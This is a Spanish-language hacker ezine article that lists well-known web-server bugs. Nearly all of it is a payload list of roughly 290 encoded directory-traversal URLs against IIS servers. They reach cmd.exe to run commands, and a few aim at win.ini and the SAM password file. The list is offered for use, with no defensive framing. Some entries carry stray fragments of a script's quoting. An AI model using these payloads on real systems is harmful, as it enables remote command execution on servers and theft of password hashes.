=-[ 0x06 ]-==================================================================
=-[ NetSearch Ezine #8 ]-====================================================
=-[ Listado de Bugs WWW ]-===================================================
=-[ por Chapulino ]-=========================================================




Aqui teneis una listado de los bugs mas conocidos para servidores WEB: 
Scripts, bugs de ficheros PHP, ASP, Permisos mal configurados, Unicode, etc..

[ Nota de Editor: En este articulo se ha omitido el limite de columnas para
facilitar la lectura del mismo. ]


[CODERED]
/scripts/root.exe?/c+dir+c:\ 

[UNICODE]
/msdac/root.exe?/c+dir+c:\ 
[1]
/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[2] 
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[3] 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[4] 
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[5] 
/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[6] 
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[7] 
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[8] 
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[9] 
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[10] 
/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" & vbCrLf & vbCrLf
[11] 
/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" & vbCrLf & vbCrLf
[12] 
/msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" & vbCrLf & vbCrLf
[13] 
/_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" & vbCrLf & vbCrLf
[14] 
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[15]  
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ 
[16]  
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[17]  
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\ 
[18]  
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\ 
[19]  
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\ 
[20]  
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ 
[21]  
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[22]  
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 
[23]  
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
[24]  
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[25]  
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ 
[26]  
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 
[27]  
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 
[28]  
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
[29]  
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
[30]  
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[31]  
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 
[32]  
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 
[33]  
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ 
[34]  
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 
[35]  
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 
[36]  
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
[37]  
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
[38]  
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[39]  
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
[40]  
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 
[41]  
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ 
[42]  
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[43]  
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
[44]  
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
[45]  
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ 
[46]  
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 
[47]  
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 
[48]  
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
[49]  
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 
[50]  
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[51]  
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[52]  
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ 
[53]  
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[54]  
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ 
[55]  
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 
[56]  
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ 
[57]  
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ 
[58]  
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 
[59]  
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[60]  
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ 
[61]  
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 
[62]  
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ 
[63]  
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ 
[64]  
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ 
[65]  
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 
[66]  
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ 
[67]  
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[68]  
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[69]  
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
[70]  
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[71]  
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
[72]  
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ 
[73]  
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[74]  
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ f
[75]  
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[76]  
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[77]  
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[78]  
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[79]  
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 
[80]  
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 

[UTFCODE]
/_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[1]
/_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[2]
/_mem_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
[3]
/_mem_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[4]
/_mem_bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[5]
/_mem_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[6]
/_mem_bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[7]
/_mem_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[8]
/_mem_bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[9]
/_mem_bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[10]
/_mem_bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[11]
/_mem_bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[12]
/_mem_bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[13]
/_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[14]
/_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[15]
/_vti_bin/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[16]
/_vti_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
[17]
/_vti_bin/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
[18]
/_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[19]
/_vti_bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[20]
/_vti_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[21]
/_vti_bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[22]
/_vti_bin/..%u002f../winnt/system32/cmd.exe?/c+dir
[23]
/_vti_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[24]
/_vti_bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[25]
/_vti_bin/..%u005c../winnt/system32/cmd.exe?/c+dir
[26]
/_vti_bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[27]
/_vti_bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[28]
/_vti_bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[29]
/_vti_bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[30]
/_vti_cnf/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[31]
/_vti_cnf/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[32]
/_vti_cnf/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[33]
/_vti_cnf/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[34]
/_vti_cnf/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[35]
/_vti_cnf/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[36]
/_vti_cnf/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[37]
/_vti_cnf/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[38]
/a.asp/.%u002e/.%u002e/.%u002e/.%u002e/winnt/win.ini
[39]
/a.asp/.%u002e/.%u002e/.%u002e/..\winnt\repair\sam._
[40]
/a.asp/..%u00255c../..%u00255c../winnt/win.ini
[41]
/a.asp/..%u00255c../..%u00255c..\winnt\repair\sam._
[42]
/a.asp/..%u002f../..%u002f../winnt/win.ini
[43]
/a.asp/..%u002f../..%u002f..\winnt\repair\sam._
[44]
/a.asp/..%u005c../..%u005c../winnt/win.ini
[45]
/a.asp/..%u005c../..%u005c..\winnt\repair\sam._
[46]
/adsamples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[47]
/adsamples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[48]
/adsamples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[49]
/adsamples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[50]
/adsamples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[51]
/adsamples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[52]
/adsamples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[53]
/adsamples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[54]
/bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[55]
/bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[56]
/bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[57]
/bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[58]
/bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[59]
/bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[60]
/bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[61]
/bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[62]
/bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[63]
/bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[64]
/bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[65]
/bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[66]
/bin/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[67]
/bin/scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[68]
/bin/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
[69]
/bin/scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
[70]
/bin/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[71]
/bin/scripts/..%u002f../winnt/system32/cmd.exe?/c+dir
[72]
/bin/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[73]
/bin/scripts/..%u005c../winnt/system32/cmd.exe?/c+dir
[74]
/cgi/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[75]
/cgi/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[76]
/cgi/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[77]
/cgi/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[78]
/cgi/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[79]
/cgi/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[80]
/cgi/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[81]
/cgi/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[82]
/cgi/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[83]
/cgi/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[84]
/cgi/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[85]
/cgi/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[86]
/cgi-bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[87]
/cgi-bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[88]
/cgi-bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[89]
/cgi-bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[90]
/cgi-bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[91]
/cgi-bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[92]
/cgi-bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[93]
/cgi-bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[94]
/exchange/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[95]
/exchange/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[96]
/exchange/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[97]
/exchange/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[98]
/exchange/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[99]
/exchange/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[100]
/exchange/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[101]
/exchange/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[102]
/msadc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[103]
/msadc/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[104]
/MSADC/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[105]
/msadc/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[106]
/msadc/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
[107]
/msadc/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
[108]
/msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[109]
/msadc/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[110]
/MSADC/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[111]
/msadc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[112]
/MSADC/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[113]
/msadc/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[114]
/msadc/..%u002f../winnt/system32/cmd.exe?/c+dir
[115]
/msadc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[116]
/msadc/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[117]
/MSADC/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[118]
/msadc/..%u005c../winnt/system32/cmd.exe?/c+dir
[119]
/msadc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[120]
/msadc/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[121]
/msadc/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[122]
/msadc/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[123]
/PBServer/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[124]
/PBServer/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[125]
/PBServer/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[126]
/PBServer/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[127]
/PBServer/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[128]
/PBServer/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[129]
/PBServer/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[130]
/PBServer/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[131]
/PBServer/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[132]
/PBServer/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[133]
/PBServer/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[134]
/PBServer/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[135]
/Rpc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[136]
/Rpc/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[137]
/Rpc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[138]
/Rpc/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[139]
/Rpc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[140]
/Rpc/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[141]
/Rpc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[142]
/Rpc/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[143]
/Rpc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[144]
/Rpc/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[145]
/Rpc/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[146]
/Rpc/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[147]
/samples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[148]
/samples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
[149]
/samples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[150]
/samples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[151]
/samples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[152]
/samples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[153]
/samples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[154]
/samples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[155]
/script/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[156]
/script/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
[157]
/script/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[158]
/script/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[159]
/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[160]
/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[161]
/scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
[162]
/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
[163]
/scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
[164]
/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
[165]
/scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir
[166]
/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
[167]
/scripts/..%u002f../..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
[168]
/scripts/..%u002f../winnt/system32/cmd.exe?/c+dir
[169]
/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[170]
/scripts/..%u005c../..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
[171]
/scripts/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
[172]
/scripts/..%u005c../winnt/system32/cmd.exe?/c+dir
[173]
/scripts/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c%20dir%20C:\
[174]
/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\
[175]
/scripts/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c%20dir%20C:\
[176]
/scripts/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c%20dir%20C:\

[DECODE]
/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[1]
/_mem_bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[2]
/_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[3]
/_mem_bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[4]
/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[5]
/_mem_bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[6]
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[7]
/_mem_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[8]
/_mem_bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[9]
/_mem_bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[10]
/_mem_bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[11]
/_mem_bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[12]
/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[13]
/_vti_bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[14]
/_vti_bin/..%%35%63../winnt/system32/cmd.exe?/c+dir
[15]
/_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[16]
/_vti_bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[17]
/_vti_bin/..%%35c../winnt/system32/cmd.exe?/c+dir
[18]
/_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[19]
/_vti_bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[20]
/_vti_bin/..%25%35%63../winnt/system32/cmd.exe?/c+dir
[21]
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[22]
/_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[23]
/_vti_bin/..%255c../winnt/system32/cmd.exe?/c+dir
[24]
/_vti_bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[25]
/_vti_bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
[26]
/_vti_bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
[27]
/_vti_bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
[28]
/_vti_cnf/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
[29]
/_vti_cnf/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
[30]
/_vti_cnf/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
[31]
/_vti_cnf/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
[32]
/_vti_cnf/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
[33]
